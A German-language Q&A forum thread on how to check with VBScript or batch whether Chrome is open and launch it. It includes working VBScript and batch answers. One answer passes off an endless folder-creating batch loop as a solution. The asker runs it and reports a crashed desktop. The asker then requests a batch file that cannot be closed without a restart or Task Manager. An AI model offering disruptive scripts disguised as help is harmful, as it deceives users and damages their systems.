wie prüft man mit vbscript ob chrome offen ist?

2 Antworten

Wie kommt ihr nur immer auf das Ver💩te VBScript. seit 12 Jahren ist Die Sprache nur noch aus Kompatibilität im System. Lasst doch den Opa in seiner Gruft...

Liebe Mitleser fragt nicht mehr nach VBS... lernt Powershell oder C# oder was anderes Hübsches

na OK ich kanns noch...

Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
sQuery = "SELECT * FROM Win32_Process WHERE Name LIKE 'chrome.exe'"
Set objItems = objWMIService.ExecQuery(sQuery)
'isRunning=vbFalse
For Each objItem In objItems
    If objItem.Name = "chrome.exe" Then
        IsRunning=vbTrue
        Exit For
    End If
Next
If not isRunning Then
    WScript.CreateObject("wscript.Shell").run "http:\\google.de" 'in de Annahme, daß Chrome  der Standardbrowser ist
End If

😤Solch ein Aufwand für etwas, das man in Batch mit einer Zeile erledigt 🥱

tasklist /nh /fi "ImageName eq chrome.exe"|find /v "chrome.exe" || (start "" "http:\\google.de")
Woher ich das weiß:eigene Erfahrung – Ich mach das seit 30 Jahren

Mit Batch geht das besser.

Öffne eine Textdatei, schreibe folgenden Code rein, speichere unter .bat oder .cmd:

@echo off

:x

md chrome+%random%

goto x

// Ende des Codes

Woher ich das weiß:eigene Erfahrung
zOmegaSkiller2
Fragesteller

kannst du mir auch sagen wie man in chrome mit batch ein link öffnet

Schueler99K  24.04.2021, 15:33
@zOmegaSkiller2

Also, meine 1. Antwort war nur Spaß, der code erstellt nur unendlich viel Ordner, aber dieser Code funktioniert:

@echo off
start chrome https://www.google.com
exit

Ob es bei Windows 10 funktioniert weiß ich nicht, aber bei mir auf Windows 8 funktionierts.

Anstatt Google kannst du auch eine andere URL verwenden.

zOmegaSkiller2
Fragesteller
@Schueler99K

Habs gemerkt aber bitte mach das nicht noch mal hat dazu geführt das mein Desktop dauerhaft abgeschmiert ist aber wahr selber dumm weil ich in dem Moment nicht nachgedacht habe das md ordner erstellen ist

zOmegaSkiller2
Fragesteller
@Schueler99K

kannst du mir trotzdem sagen wie das mit vbs geht oder wie ich dafür sorge das man die bat nicht schließen kann ohne neustart und ohne task-manager

zOmegaSkiller2
Fragesteller

Habs gemerkt aber bitte mach das nicht noch mal hat dazu geführt das mein Desktop dauerhaft abgeschmiert ist